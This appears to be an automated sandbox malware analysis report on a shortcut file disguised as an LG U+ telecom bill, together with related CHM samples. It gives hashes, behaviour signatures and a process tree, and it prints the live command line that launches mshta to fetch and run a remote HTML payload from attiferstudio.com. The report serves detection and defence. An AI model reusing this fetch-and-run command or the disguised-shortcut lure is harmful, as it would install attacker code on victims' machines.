Overview
overview
10Static
static
8LG์ ํ๋... .html
windows7-x64
1LG์ ํ๋... .html
windows10-2004-x64
1LG์ ํ๋...ml.lnk
windows7-x64
10LG์ ํ๋...ml.lnk
windows10-2004-x64
10MAIL_20230...02.chm
windows7-x64
10MAIL_20230...02.chm
windows10-2004-x64
10Message.chm
windows7-x64
10Message.chm
windows10-2004-x64
10Message.chm
windows7-x64
10Message.chm
windows10-2004-x64
10Analysis
-
max time kernel
144s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
21-03-2023 23:32
Behavioral task
behavioral1
Sample
LG์ ํ๋ฌ์ค_์ด๋ํต์ _202208_์ด_์ .html
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
LG์ ํ๋ฌ์ค_์ด๋ํต์ _202208_์ด_์ .html
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
LG์ ํ๋ฌ์ค_์ด๋ํต์ _202208_์ด_์ .html.lnk
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
LG์ ํ๋ฌ์ค_์ด๋ํต์ _202208_์ด_์ .html.lnk
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
MAIL_20230125151802.chm
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
MAIL_20230125151802.chm
Resource
win10v2004-20230221-en
Behavioral task
behavioral7
Sample
Message.chm
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
Message.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
Message.chm
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
Message.chm
Resource
win10v2004-20230220-en
General
-
Target
LG์ ํ๋ฌ์ค_์ด๋ํต์ _202208_์ด_์ .html.lnk
-
Size
1KB
-
MD5
eb7a6e3dc8bbc26f208c511ec7ee1d4c
-
SHA1
b259d84f43f10a00edf1eca1c48610490e0aeb4c
-
SHA256
7c248e03cf87ea3d9a207b17925b7fd8998e9a0b462e601d178ff4c1cd9a1708
-
SHA512
b583bf4cd0b31b9961a268cacd1d05c104886487960c03924c3ba07c33aa56743ed9c3d30bc0191c501db5214360612ae0c8721690001fc8a459c06609dc7227
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/3.html
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 4 1752 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 1584 wrote to memory of 364 1584 cmd.exe cmd.exe PID 1584 wrote to memory of 364 1584 cmd.exe cmd.exe PID 1584 wrote to memory of 364 1584 cmd.exe cmd.exe PID 364 wrote to memory of 1752 364 cmd.exe mshta.exe PID 364 wrote to memory of 1752 364 cmd.exe mshta.exe PID 364 wrote to memory of 1752 364 cmd.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\LG์ ํ๋ฌ์ค_์ด๋ํต์ _202208_์ด_์ .html.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start mshta http://attiferstudio.com/install.bak/sony/3.html2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://attiferstudio.com/install.bak/sony/3.html3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings